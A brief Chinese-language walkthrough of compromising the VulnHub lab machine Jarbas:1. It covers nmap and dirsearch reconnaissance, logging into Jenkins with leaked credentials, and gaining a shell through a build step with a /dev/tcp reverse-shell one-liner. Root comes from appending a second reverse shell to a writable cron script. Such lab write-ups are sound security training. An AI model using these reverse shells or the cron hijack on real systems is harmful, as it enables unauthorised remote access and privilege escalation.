靶机下载: Jarbas: 1 ~ VulnHub
提升条件:Web或用户权限进行查看,计划任务文件可修改
1、信息收集:
工具扫描
nmap扫描
nmap 192.168.0.0/24
扫描出靶机ip 192.168.0.7
访问网站
dirsearch扫描
python dirsearch.py -u 192.168.0.7
访问后台
这里泄露了用户名密码(密码是md5加密)
登录网站是 8080端口
2、获取权限
登录后台
获取webshell
参考文章:Jenkins拿shell方法-腾讯云开发者社区-腾讯云
构建shell时要根据靶机的系统选择,我这里是linux靶机,选择第二个
写反弹命令
反弹shell生成器
sh -i >& /dev/tcp/192.168.0.4/5555 0>&1
kali开启监听
nc -lvvp 5555
保存-》立即构建
获得shell
3、权限提升:
计划任务提权
cat /etc/crontab //查看计划任务
ls -lia /etc/script/CleaningScript.sh //查看权限
查看权限发现可以修改计划任务
echo "/bin/bash -i >& /dev/tcp/192.168.0.4/5544 0>&1" >> /etc/script/CleaningScript.sh //修改计划任务
修改计划任务,kali监听5544端口
提权成功